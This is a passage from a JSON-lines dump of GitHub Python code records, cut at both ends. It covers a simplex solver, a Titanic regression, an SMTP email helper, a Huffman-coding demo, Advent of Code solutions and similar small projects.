data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para) not in key_expression:\n if simu_results[i][3] != 'False' and simu_results[i][4] != 'False':\n key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)] = \\\n {'Expression': expression, 'efficiency': float(simu_results[i][4]) / 100,\n 'output_voltage': float(simu_results[i][3])}\n else:\n key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)] = \\\n {'Expression': expression, 'efficiency': 0, 'output_voltage': target_vout_min}\n\n effis = key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)]\n tmp_reward = calculate_reward(effis, configs[\"target_vout\"])\n\n if tmp_reward > reward:\n reward = tmp_reward\n tmp_result = key_expression[data_json_file[data_fn]['key'] + '$' + str(duty_cycle_para)]\n tmp_para = str(duty_cycle_para)\n i += 1\n break\n else:\n continue\n if tmp_para == '0.5' and tmp_result['efficiency'] > 0.9 and tmp_result['output_voltage'] > 47:\n good_result_num += 1\n print('good_result_num', good_result_num)\n time.sleep(0.5)\n if reward > max_reward:\n max_reward = reward\n result = tmp_result\n para = tmp_para\n print(good_result_num)\n\n # return\n\n # topologies = [sim.get_state()]\n effis = [{'efficiency': result['efficiency'], 'output_voltage': result['output_voltage']}]\n print(\"effis of topo:\", effis, \" para:\", para)\n fo.write(\"efficiency:\" + str(effis) + \"\\n\")\n fo.write(\"final reward:\" + str(max_reward) + \"\\n\")\n fo.write(\"query time:\" + str(query_number) + \"\\n\")\n # sim.get_state().visualize(\n # \"result with parameter:\" + str(str(final_para_str)) + \" \", figure_folder)\n end_time = datetime.datetime.now()\n fo.write(\"end at:\" + str(end_time) + \"\\n\")\n fo.write(\"start at:\" + str(start_time) + \"\\n\")\n fo.write(\"execute time:\" + str((end_time - start_time).seconds) + \" seconds\\n\")\n fo.write(\"result with parameter:\" + str(str(para)) + \"\\n\")\n fo.write(\"----------------------------------------------------------------------\" + \"\\n\")\n fo.write(\"configs:\" + str(configs) + \"\\n\")\n\n result = \"Traj: \" + str(traj)\n print(effis, \", \", para)\n if para == '0.5' and effis[0]['efficiency'] > 0.9 and effis[0]['output_voltage'] > 47:\n good_result_num += 1\n result = result + \"#efficiency:\" + str(effis[0]['efficiency']) + \"#vout:\" + str(effis[0]['output_voltage']) \\\n + \"#para:\" + str(para) + \"#FinalRewards:\" + str(\n max_reward) + \"#ExecuteTime:\" + str((end_time - start_time).seconds) + \"#QueryTime:\" + str(\n query_number)\n results.append(result)\n del key_expression\n gc.collect()\n\n print(\"figures are saved in:\" + str(figure_folder) + \"\\n\")\n print(\"outputs are saved in:\" + out_file_name + \"\\n\")\n for result in results:\n fo.write(result + \"\\n\")\n\n fo.write('good prob:' + str(good_result_num / len(traj_list)) + \"\\n\")\n print(good_result_num / len(traj_list))\n fo.close()\n\n # save_reward_hash(sim)\n del result\n gc.collect()\n return\n\n\ndef read_result(file_name):\n # Traj: 2000#efficiency:0.98#vout:49.0#para:0.5#FinalRewards:0.9023840000000001#ExecuteTime:3321#QueryTime:2000\n file_name = 'Results/'+file_name\n fo_conf = open(file_name, \"r\")\n line = fo_conf.readline()\n good_count = 0\n total_count = 0\n effis = []\n while True:\n line = fo_conf.readline()\n # print(line)\n if not line:\n break\n if 'Traj: ' in line:\n print(line)\n total_count+=1\n if total_count>100:\n break\n items = line.split('#')\n for item in items:\n if 'efficiency' in item:\n effi = float(item.split(':')[1])\n elif 'para' in item:\n para = float(item.split(':')[1])\n elif 'vout' in item:\n vout = float(item.split(':')[1])\n elif 'Traj' in item:\n traj = float(item.split(':')[1])\n if effi >= 0.9 and 45.0 < vout < 55:\n\n good_count += 1\n if effi>40:\n effi = 0.98\n if effi >= 0.9 and (vout < 40.0 or vout > 60):\n effi = 0.01\n effis.append(effi)\n print(effis)\n print(len(effis))\n print(\"avg:\", np.mean(effis))\n print(\"std error:\", np.var(effis)/math.sqrt(total_count))\n print(good_count / 100)\n\n\n","repo_name":"fanshaoze/RL-AL-for-Power-Converter-Design","sub_path":"UCT_5_UCB_unblc_restruct_DP_v1/Algorithms/RandomSampling.py","file_name":"RandomSampling.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"16057881490","text":"import numpy as np\nfrom numpy.linalg import inv\n\nclass Simplex:\n\n def __init__(self, A, b,c, rule: int = 0):\n self.coefMatrix = A\n self.valueMatrix = b\n self.costMatrix = c\n self.rule = rule\n\n def copatibilityCheck(self, rowCount, colCount):\n if colCount < rowCount:\n return False , \"System Incompatibility ------ (no. of variables : {} GREATER THAN {} : no.of constraints\".format(colCount, rowCount)\n if b.shape != (rowCount,):\n return False, \"System Incompatibility ------ Cost Matrix_j has shape {}, expected {}.\".format(b.shape, (rowCount,))\n if c.shape != (colCount,):\n return False, \"System Incompatibility ------ Cost Matrix has shape {}, expected {}.\".format(c.shape, (colCount,))\n return True, \"Success\"\n\n def simplexBase(self):\n rowCount, colCount = self.coefMatrix.shape[0], self.coefMatrix.shape[1]\n\n error, msg = self.copatibilityCheck(rowCount, colCount)\n if not error:\n return msg\n\n bfs1 = [0]*(colCount - rowCount) + [1 for i in range((rowCount))]\n bfs1 = np.array(bfs1)\n basic_init = set(range(colCount-rowCount,colCount))\n\n msg, x, basic, ofv, bfs, count = self.simplexPhaseII(bfs1, basic_init)\n\n if msg == 0:\n print(\"\\n\\n\" +\n \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SOLUTION to the LP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\" +\n \"\\n\\n\" +\n \"Found optimal solution at x = {}. \\n\".format(x) +\n \"Basic variables: {}\\n\".format(basic) +\n \"Nonbasic variables: {}\\n\".format(set(range(colCount)) - basic) +\n \"Optimal value function: {}.\".format(ofv))\n elif msg == 1:\n\n print (\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\" +\n \"\\n\\n\" +\n \"LP is UNBOUNDED\")\n\n return msg, x, ofv, bfs\n\n def unBoundedCheck(self, rccv_q, N, B_inv):\n for item, i in zip(rccv_q, N):\n if item[0] > 0:\n a = B_inv * self.coefMatrix[:, item[1]]\n return all(i <= 0 for i in a)\n return False\n\n def blandsRule(self,prices, N):\n\n rccv =[((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N]\n posRccv = [item[1] for item in rccv if item[0] > 0]\n minSub = min(posRccv) if posRccv else 0\n corRccv = 0\n for i,j in rccv:\n if minSub == j:\n corRccv = i\n rcc = [(self.costMatrix[q] - prices * self.coefMatrix[:, q]).item() for q in N]\n\n return all(i <= 0 for i in rcc), corRccv, minSub\n\n def maxCoefRule(self, prices, N):\n rccv, q = max([((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N],\n key=(lambda item: item[0]))\n rcc = [(self.costMatrix[q] - prices * self.coefMatrix[:, q]).item() for q in N]\n\n return all(i <=0 for i in rcc), rccv, q\n\n def simplexPhaseII(self, x: np.array, basic: set, ):\n\n rowCount, colCount = self.coefMatrix.shape[0], self.coefMatrix.shape[1]\n B, N = list(basic), set(range(colCount)) - basic\n B_inv = inv(self.coefMatrix[:, B])\n\n ofv = np.dot(self.costMatrix, x)\n del basic\n\n count = 1\n while count < 50:\n rccv, basicwitch, nonBasicSwitch, delta, mipr = None, None, None, None, None\n\n prices = self.costMatrix[B] * B_inv\n rccv_q = [((self.costMatrix[q] - prices * self.coefMatrix[:, q]).item(), q) for q in N]\n\n print (\"------------------------------------------------------------------------\")\n print (\"---------------------- Iteration - {} ----------------------------------\".format(count))\n print (\"Next Basic variables: {}\\n\".format(B) +\n \"Next Nonbasic variables: {}\\n\".format(N) +\n \"Objective value function: {}\\n\".format(ofv) +\n \"RCCV : {}\".format(rccv_q) )\n\n print (\"------------------------------------------------------------------------\")\n\n count += 1\n\n unbounded = self.unBoundedCheck(rccv_q, N, B_inv)\n if unbounded:\n return 1, x, set(B), None, mipr, count\n\n if self.rule == 0:\n \"\"\"Blands AntiCycling Rule\"\"\"\n optimum, rccv, basicwitch = self.blandsRule(prices, N)\n\n elif self.rule == 1:\n \"\"\"Maximum Coefficient Rule\"\"\"\n optimum, rccv, basicwitch = self.maxCoefRule(prices,N)\n\n else:\n \"\"\"No Valid Rule\"\"\"\n raise ValueError (\"Please input a valid Pivot Rule\")\n\n if optimum:\n \"\"\"Optimum Value Found\"\"\"\n ofv = np.dot(prices, self.valueMatrix)\n if all(i for i in x >=0):\n return 0, x, set(B), ofv, None, count\n\n \"\"\"Build the next BFS\"\"\"\n bfsbuild = np.zeros(colCount)\n for i in range(rowCount):\n bfsbuild[B[i]] = (-B_inv[i, :] * self.coefMatrix[:, basicwitch]).item()\n\n bfsbuild[basicwitch] = 1\n\n mipr = [(-x[B[i]] / bfsbuild[B[i]], i) for i in range(rowCount) if bfsbuild[B[i]] < 0]\n\n if len(mipr) == 0:\n print(\"Unbounded Problem has been identified\")\n return 1, x, set(B), None, bfsbuild, count\n\n delta, nonBasicSwitch = max(mipr, key=(lambda item: item[0]))\n\n \"\"\"Update the variables\"\"\"\n x = np.array([var for var in (x + delta * bfsbuild)])\n\n \"\"\"Update Objective fucntion value\"\"\"\n ofv = (ofv + delta * rccv)\n\n for i in set(range(rowCount)) - {nonBasicSwitch}:\n B_inv[i, :] -= bfsbuild[B[i]]/bfsbuild[B[nonBasicSwitch]] * B_inv[nonBasicSwitch, :]\n\n B_inv[nonBasicSwitch, :] /= -bfsbuild[B[nonBasicSwitch]]\n\n \"\"\"Non Basic Variable update\"\"\"\n N = N - {basicwitch} | {B[nonBasicSwitch]}\n\n \"\"\"Basic Variable update\"\"\"\n B[nonBasicSwitch] = basicwitch\n\n raise TimeoutError(\"LP is running into Infinite Loop\")\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Rule 0 - Bland's Anti Cyclic Rule\n Rule 1 - Maximum Coefficient Pivot rule \n \"\"\"\n rule = 0\n\n \"\"\"\n Example 1\n \"\"\"\n A = np.matrix([[0.5, -5.5,-2.5,9,1,0,0], [0.5, -1.5, -0.5,1, 0,1,0],[1,0,0,0,0,0,1]])\n b = np.array([0,0,1])\n c = np.array([10, -57,-9,-24, 0,0,0])\n\n \"\"\"\n Example 2\n \"\"\"\n A = np.matrix([[1,0,0,1,0,0], [0,1,0,0,1,0],[0,0,1,0,0,1]])\n b = np.array([2,1,6])\n c = np.array([2,3,1,0,0,0])\n\n\n \"\"\"\n Example 3\n \"\"\"\n # A = np.matrix([[200,80,40,1], [1,1,1,0]])\n # b = np.array([10000,50])\n # c = np.array([60,20,30,0])\n obj = Simplex(A, b, c, rule)\n obj.simplexBase()\n\n","repo_name":"Nagi19/Simplex-Algorithm","sub_path":"simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":6909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33458324211","text":"from sklearn.linear_model import LinearRegression\nimport numpy as np\nfrom sklearn.cross_validation import KFold\nimport process_data as processed_data\n# Sklearn also has a helper that makes it easy to do cross validation\n\n# The columns we'll use to predict the target\npredictors = [\"Pclass\", \"Sex\", \"Age\", \"SibSp\", \"Parch\", \"Fare\", \"Embarked\"]\n\n# Initialize our algorithm class\nalg = LinearRegression()\n# Generate cross validation folds for the titanic dataset. It return the row indices corresponding to train and test.\n# We set random_state to ensure we get the same splits every time we run this.\nkf = KFold(processed_data.titanic.shape[0], n_folds=3, random_state=1)\n\npredictions = []\nfor train, test in kf:\n # The predictors we're using the train the algorithm. Note how we only take the rows in the train folds.\n train_predictors = (processed_data.titanic[predictors].iloc[train,:])\n # The target we're using to train the algorithm.\n train_target = processed_data.titanic[\"Survived\"].iloc[train]\n # Training the algorithm using the predictors and target.\n alg.fit(train_predictors, train_target)\n # We can now make predictions on the test fold\n test_predictions = alg.predict(processed_data.titanic[predictors].iloc[test,:])\n predictions.append(test_predictions)\n\n # The predictions are in three separate numpy arrays. Concatenate them into one.\n# We concatenate them on axis 0, as they only have one axis.\npredictions = np.concatenate(predictions, axis=0)\n\n # Map predictions to outcomes (only possible outcomes are 1 and 0)\npredictions[predictions > .5] = 1\npredictions[predictions <=.5] = 0\naccuracy = sum(predictions[predictions == processed_data.titanic[\"Survived\"]]) / len(predictions)\nprint(accuracy)","repo_name":"raghav/kaggle_titanic_problem","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"35922009041","text":"def createEvent(title, capacity, timeStart, timeEnd, lastTimeToLeave,\n desc, fee, earlyBirdTime ):\n buf = {\n 'title':title,\n 'capacity':capacity,\n 'timeStart':timeStart,\n 'timeEnd':timeEnd,\n 'lastTimeToLeave':lastTimeToLeave, \n 'description':desc,\n 'fee':fee,\n 'earlyBirdTime': earlyBirdTime\n }\n return buf\n\nclass Sample_Events():\n\n def __init__(self):\n e1 = createEvent(\n \"2018 Mitsubishi Sustainability Lecture: The Promise and Peril of the Fourth Industrial Revolution\",\n \"900\",\n \"2018-05-30T17:30\",\n \"2018-05-30T21:00\",\n \"2018-05-30T18:30\",\n \"The lecture will explore how we might realise the benefits of sustainable, responsible and human-centred innovation.\",\n \"40\",\n \"2018-05-27T17:30\"\n )\n\n\n e2 = createEvent(\n \"Lethal Autonomous Robots and the plight of the non-combatant\",\n \"50\",\n \"2018-05-30T18:00\",\n \"2018-05-30T19:15\",\n \"2018-05-30T18:05\",\n \"Roboticist and robot ethics expert Ron Arkin asks if robots should be soldiers?\",\n \"20\",\n \"2018-05-30T12:00\"\n )\n\n\n e3 = createEvent(\n \"Hacky Hour with special guest Dr Jack Yang\",\n \"40\",\n \"2018-05-31T15:00\",\n \"2018-05-31T16:00\",\n \"2018-05-31T15:30\",\n \"Hacky Hour with a special talk on Accelerating Material Discovery with Artificial Intelligence by Dr Jack Yang.\",\n \"5000\",\n \"2018-04-31T15:00\"\n )\n\n e4 = createEvent(\n \"How do we know what our students know? The benefits of a hurdle-based approach to learning and assessment\",\n \"500\",\n \"2018-05-31T17:00\",\n \"2018-05-31T18:30\",\n \"2018-05-31T17:05\",\n \"There’s a problem with the way we assess our students. We don’t know what they know...\",\n \"8\",\n \"2018-05-30T17:00\"\n )\n\n\n e5 = createEvent(\n \"Software Carpentry (Intro to Unix, Python and Git)\",\n \"800\",\n \"2018-06-04T09:30\",\n \"2018-06-15T09:30\",\n \"2018-06-04T09:50\",\n \"Join us for this live two-day coding workshop where we write programs that produce results, using the researcher-focused training modules from the highly regarded Software Carpentry Foundation.\",\n \"40\",\n \"2018-05-31T17:00\"\n )\n\n\n e6 = createEvent(\n \"Reforming Australia's refugee policy: Where do we begin?\",\n \"2000\",\n \"2018-06-06T16:00\",\n \"2018-06-06T17:00\",\n \"2018-06-06T16:45\",\n \"Please join us for this Grand Challenge meetup, with guest speaker Paul Power, CEO of the Refugee Council of Australia.\",\n \"90000\",\n \"2018-06-06T11:00\"\n )\n\n\n e7 = createEvent(\n \"myExperience Dashboard: What's all the hype about?\",\n \"50\",\n \"2018-06-13T13:00\",\n \"2018-06-13T14:00\",\n \"2018-06-13T13:05\",\n \"We will explain in more detail how the myExperience program is carried out and discuss how it is affecting QA/QE processes.\",\n \"10\",\n \"2018-06-10T13:00\"\n )\n self.events = [e1, e2, e3, e4, e5, e6, e7]\n\n","repo_name":"vickyw1112/EMS-Web","sub_path":"sample/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"41569623779","text":"\nimport pyailib as pl\n\npath = '../../data/files/english_sentence.txt'\n\nh = pl.HuffmanCoding(path)\n\noutput_path = h.compress()\nprint(\"Compressed file path: \" + output_path)\n\ndecom_path = h.decompress(output_path)\nprint(\"Decompressed file path: \" + decom_path)\n","repo_name":"antsfamily/pyailib","sub_path":"examples/compression/demo_huffman_coding.py","file_name":"demo_huffman_coding.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"15399539140","text":"import csv\n\ndef readdata(filenm):\n data = {}\n f=open(r\"class.csv\")\n reader = csv.DictReader(f)\n for row in reader: \n key = row.pop('NAME').upper()\n data[key]=row\n f.close()\n return data\n\ndef get_rec(mydata,txt):\n return mydata.get(txt) #,\"Key nonexistent\")\n# return mydata[txt]\n# for k, v in mydata.items():\n# if k==txt :\n# return v\n #print(k, v)\n\n\nmydata = readdata(\"class.csv\")\nprint(mydata.keys())\nprint(\"Select Comma delimited list of Name IDsr or ALL to export records to file\\n\")\ninp=input('Enter Choice:')\nwith open('lesson.txt','w') as f:\n field_names = ['NAME', 'SEX', 'AGE', 'HEIGHT', 'WEIGHT']\n writer=csv.DictWriter(f,fieldnames=field_names)\n writer.writeheader()\n if inp.upper()=='ALL':\n for k, v in mydata.items(): \n v.update({'NAME':k})\n writer.writerow(v)\n #csv.writer(f).write(mydata.items())\n else:\n for i in inp.split(','):\n data=get_rec(mydata,i)\n data['NAME']=i\n writer.writerow(data)\n\n# with open('lesson.txt','w') as f:\n# csv.writer(f).writerows(z.items())\n# f.write(f'\\n' + z + '\\n')\n \n#print(z)\n\n#data_points = [\"id\",\"age\",\"sex\"]\n\n\n\n\n# data=[]\n# f= open(r\"class.csv\",'r')\n# for line in f:\n# data_line=line.strip().split(',')\n# data.append(data_line)\n# print(line)\n# print (data)\n# f.close()\n\n# import pandas as pd\n# df = pd.read_csv('class.csv')\n# print(df)\n\n\n\n\n\n\n\n# import csv\n# def read_data(input_file):\n# \"\"\"read in the data and return a dictionary\"\"\" \n# data = {}\n# with open(input_file) as infile:\n# reader = csv.DictReader(infile)\n# for row in reader:\n# key = row.pop('NAME').upper()\n# data[key]=row\n# return data \n\n \n# def get_subject_details(subject,data):\n \n# try:\n# return data[subject]\n# except KeyError:\n# raise KeyError(\"Subject not found\")\n \n\n# if __name__==\"__main__\":\n# data = read_data(\"class.csv\")\n \n# value = get_subject_details(\"ALICE\",data)\n \n# print(value)","repo_name":"thunter2309/assignments","sub_path":"Lesson3/Lesson3.py","file_name":"Lesson3.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38939995268","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport csv\nimport json\nimport os\n\n\nclass Tools:\n\n \"\"\"\n Classe responsável por disponibilizar ferramentas mais utlizadas\n Author: Ismael Pires\n \"\"\"\n\n def __init__(self):\n pass\n\n @classmethod\n def format_data(cls, _path, _output='list'):\n\n if _path is None:\n return None\n\n try:\n\n extension = os.path.splitext(_path)[1][1:].strip().lower()\n\n if extension == 'json':\n\n with open(_path) as json_file:\n return json.load(json_file)\n\n elif extension == 'csv':\n with open(_path) as csv_file:\n\n # Lendo os dados do arquivo csv\n csv_reader = csv.reader(csv_file, delimiter=';')\n result = {}\n\n # Definindo o dicionário de dados\n for row in csv_reader:\n\n # Definindo cada item do meu dicionário, o primeiro item da lista é a chave do dicionário\n result[row[0]] = row[1:]\n\n return result\n\n else:\n return None\n\n except (AttributeError, ValueError, TypeError, KeyboardInterrupt, Exception) as e:\n print('Ocorreu um erro ao converter os dados. [{}] (fd-01)'.format(e))\n return None\n\n\n","repo_name":"ismael-pires/kohonen-algorithm","sub_path":"classes/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"29294247246","text":"from data_classes.databse_file_handlers.smartphone import SmartPhone\nfrom random import randint\nimport pickle\n\nsmart_phone1 = SmartPhone(\"Samsung\", \"A50\", 500,\n \"Taiwan\", \"Samsung INC\", randint(1, 100000000), [])\nsmart_phone2 = SmartPhone(\"Nokia\", \"3310\", 130, \"Finland\",\n \"Nokia INC\", randint(1, 100000000), [])\nsmart_phone3 = SmartPhone(\"Apple\", \"Iphone 7s\", 500,\n \"China\", \"Apple INC\", randint(1, 100000000), [])\nsmart_phone4 = SmartPhone(\"Apple\", \"Iphone X\", 800,\n \"China\", \"Apple INC\", randint(1, 100000000), [])\nsmart_phone5 = SmartPhone(\"Huawei\", \"P40 Pro\", 700,\n \"China\", \"Huawei INC\", randint(1, 100000000), [])\n\nlinked_data_paths = {\"data_path\": \"bin/smartphone_data\",\n \"metadata_path\": \"bin/smartphone_metadata.json\", \"database_type\": \"serial\"}\n\ndata = []\ndata.append(smart_phone1)\ndata.append(smart_phone2)\ndata.append(smart_phone3)\ndata.append(smart_phone4)\ndata.append(smart_phone5)\n\n\nfile_name = type(smart_phone1).__name__.lower()\n\n# for d in data:\n# print(str(d))\n\n\nprint(file_name)\nwith open(\"data/\"+file_name, 'wb') as data_file:\n # koristimo pickle da bismo serijalizovali u binarnu datoteku\n pickle.dump(linked_data_paths, data_file)\n\n\n# res = None\n# with open(\"bin/smartphone_data\", \"rb\") as f:\n# res = pickle.load(f)\n\n# print(res)\n","repo_name":"mijicstefan/simsNEW","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34567470393","text":"import smtplib\nfrom config import Config\nimport logging\n\nconfig = Config()\nlogger = logging.getLogger(__name__)\n\n\ndef send_email(receiver, subject, text):\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.login(config.EMAIL_USERNAME, config.EMAIL_PASSWORD)\n\n body = '\\r\\n'.join(['To: {}'.format(receiver),\n 'From: {}'.format(config.EMAIL_USERNAME),\n 'Subject: {}'.format(subject),\n '', text])\n\n try:\n server.sendmail(config.EMAIL_USERNAME, [receiver], body)\n logger.debug(\"Email to {} with subject: {} sent\".format(receiver, subject))\n except Exception as e:\n logger.error(\"Could not send email. Error: {}\".format(e))\n\n server.quit()\n","repo_name":"KrasnovVitaliy/postback_collector","sub_path":"app/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27944410536","text":"def solution(m, n, puddles):\n matrix=[[0]*m for _ in range(n)] #경우의수\n\n # 초기값\n for x,y in puddles:\n matrix[x-1][y-1]=None\n\n for row in range(1,n):\n if matrix[row][0]==None:\n break\n matrix[row][0]=1\n\n for col in range(1,m):\n if matrix[0][col]==None:\n break\n matrix[0][col]=1\n \n #dp\n for i in range(1,n):\n for j in range(1,m):\n if matrix[i][j]!=None:\n upper=matrix[i-1][j]\n left=matrix[i][j-1]\n\n if upper==left==None:\n matrix[i][j]=None\n elif upper==None:\n matrix[i][j]=left%1000000007\n elif left==None:\n matrix[i][j]=upper%1000000007\n else:\n matrix[i][j]=(upper+left)%1000000007\n \n answer=matrix[n-1][m-1]\n return answer\n\nm=4\nn=3\n# puddles=[[2,2]]\npuddles=[]\nprint(solution(m,n,puddles))","repo_name":"minji1110/algorithm_python","sub_path":"programmers/등굣길.py","file_name":"등굣길.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21160036771","text":"import numpy as np\nfrom collections import defaultdict\nimport math\nfrom functools import reduce\nfrom operator import mul\n\nnp.set_printoptions(linewidth=300)\n\n\ndef read_file() -> list:\n with open(f\"{__file__.rstrip('main.py')}input.txt\", \"r\") as f:\n return [line for line in f.read().split(\"\\n\\n\")]\n\n\ndef _prep_in(inp):\n in_data = {}\n for val in inp:\n val = val.split(\"\\n\")\n k = int(val[0].split(\" \")[1].replace(\":\", \"\"))\n v = np.array([[c for c in line] for line in val[1:]])\n in_data[k] = v\n return in_data\n\n\ndef _edges(v):\n e1 = v[0]\n e2 = v[-1]\n e3 = v[:, 0]\n e4 = v[:, -1]\n ee = [e1, e2, e3, e4]\n ee = ee + [reversed(x) for x in ee]\n return [''.join(x) for x in ee]\n\n\ndef _next_state(v):\n for _ in range(4):\n yield v\n yield np.flip(v, axis=0)\n v = np.rot90(v, k=3)\n\n\ndef _find_next_square(new_k, new_v, eem, in_data):\n e3 = ''.join(new_v[:, -1])\n tmp_k = [x for x in eem[e3] if x != new_k][0]\n new_vv = in_data[tmp_k]\n for nnv in _next_state(new_vv):\n if e3 == ''.join(nnv[:, 0]):\n return tmp_k, nnv\n\n\ndef _check_all_poss_1(in_data):\n eem = defaultdict(list)\n for k, v in in_data.items():\n for e in _edges(v):\n eem[e].append(k)\n\n cors = []\n for k, v in in_data.items():\n cnt = sum([len(eem[e]) - 1 for e in _edges(v)[:4]])\n if cnt == 2:\n cors.append(k)\n\n return reduce(mul, cors)\n\n\ndef _check_all_poss_2(in_data):\n sqr = int(math.sqrt(len(in_data)))\n\n eem = defaultdict(list)\n for k, v in in_data.items():\n for e in _edges(v):\n eem[e].append(k)\n\n cors = []\n for k, v in in_data.items():\n cnt = sum([len(eem[e]) - 1 for e in _edges(v)[:4]])\n if cnt == 2:\n cors.append(k)\n\n ltk = cors[0]\n ltv = in_data[ltk]\n for nltv in _next_state(ltv):\n if ((len(eem[''.join(nltv[:, -1])]) == 2)\n and (len(eem[''.join(nltv[-1])]) == 2)):\n ltv = nltv\n break\n\n big_square_ind = [[None] * sqr for _ in range(sqr)]\n big_square_ind[0][0] = (ltk, ltv)\n for y in range(sqr):\n if y > 0:\n ak, av = big_square_ind[y - 1][0]\n nk, nv = _find_next_square(ak, np.flip(\n np.rot90(av, k=1), axis=0), eem, in_data)\n big_square_ind[y][0] = (nk, np.flip(np.rot90(nv, k=1), axis=0))\n\n for x in range(1, sqr):\n ak, av = big_square_ind[y][x - 1]\n big_square_ind[y][x] = _find_next_square(ak, av, eem, in_data)\n\n rows = []\n for y in range(sqr):\n rows.append(\n np.hstack(\n [big_square_ind[y][x][1][1:-1, 1:-1] for x in range(sqr)]))\n big_image = np.vstack(rows)\n\n monster = np.array([\n ['.', '.', '.', '.', '.', '.', '.', '.', '.', '.',\n '.', '.', '.', '.', '.', '.', '.', '.', '#', '.'],\n ['#', '.', '.', '.', '.', '#', '#', '.', '.', '.',\n '.', '#', '#', '.', '.', '.', '.', '#', '#', '#'],\n ['.', '#', '.', '.', '#', '.', '.', '#', '.', '.',\n '#', '.', '.', '#', '.', '.', '#', '.', '.', '.']\n ])\n ly_m = len(monster)\n lx_m = len(monster[0])\n l_img = len(big_image)\n for n_img in _next_state(big_image):\n cnt = 0\n for y in range(l_img - ly_m):\n for x in range(l_img - lx_m):\n good_one = True\n for ym in range(ly_m):\n for xm in range(lx_m):\n if ((monster[ym][xm] == '#')\n and (n_img[y + ym][x + xm] != '#')):\n good_one = False\n break\n if not good_one:\n break\n if good_one:\n cnt += 1\n if cnt > 0:\n break\n\n res = np.count_nonzero(n_img == '#') - cnt * \\\n np.count_nonzero(monster == '#')\n return res\n\n\ndef part_1(inp):\n in_data = _prep_in(inp)\n res = _check_all_poss_1(in_data)\n return res\n\n\ndef part_2(inp):\n in_data = _prep_in(inp)\n res = _check_all_poss_2(in_data)\n return res\n\n\ndef main():\n inp = read_file()\n res_1 = part_1(inp)\n print(f\"res_1: {res_1}\")\n res_2 = part_2(inp)\n print(f\"res_2: {res_2}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"simmarum/AdventOfCode","sub_path":"2020/day-20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34495200667","text":"# PART 1 ----------------------\nwith open('input3.txt') as f:\n datas = f.readlines()\n\ngamma = epsylon = ''\nfor i in range(len(datas[0]) - 1):\n zero = one = 0\n for data in datas:\n if int(data[i]) == 0:\n zero += 1\n if int(data[i]) == 1:\n one += 1\n if zero > one:\n gamma = gamma + '0'\n epsylon = epsylon + '1'\n if zero < one:\n gamma = gamma + '1'\n epsylon = epsylon + '0'\n\ngamma = int(gamma, 2)\nepsylon = int(epsylon, 2)\nconsumption = gamma * epsylon\n\nprint(\"The power consumption of the submarinec is about\", consumption)\n\n# PART 2 ----------------------\ngenerator = datas.copy()\nscrubber = datas.copy()\nfor i in range(len(datas[0]) - 1):\n zero = []\n one = []\n for index, data in enumerate(generator):\n if int(data[i]) == 0:\n zero.append(index)\n if int(data[i]) == 1:\n one.append(index)\n\n if len(generator) > 1:\n zero.reverse()\n one.reverse()\n if len(zero) == len(one):\n for j in zero:\n generator.pop(j)\n elif len(zero) > len(one):\n for j in one:\n generator.pop(j)\n elif len(zero) < len(one):\n for j in zero:\n generator.pop(j)\n\n # ----------------------\n\n zero = []\n one = []\n for index, data in enumerate(scrubber):\n if int(data[i]) == 0:\n zero.append(index)\n if int(data[i]) == 1:\n one.append(index)\n\n if len(scrubber) > 1:\n zero.reverse()\n one.reverse()\n if len(zero) == len(one):\n for j in one:\n scrubber.pop(j)\n elif len(zero) < len(one):\n for j in one:\n scrubber.pop(j)\n elif len(zero) > len(one):\n for j in zero:\n scrubber.pop(j)\n\nprint(\"The life support rating of the submarine is about\", int(generator[0], 2) * int(scrubber[0], 2))\n","repo_name":"Squify/Advent-of-Code-2021","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"1680294261","text":"__author__ = 'zwilson'\r\n\r\nimport math\r\nimport time\r\nstart_time = 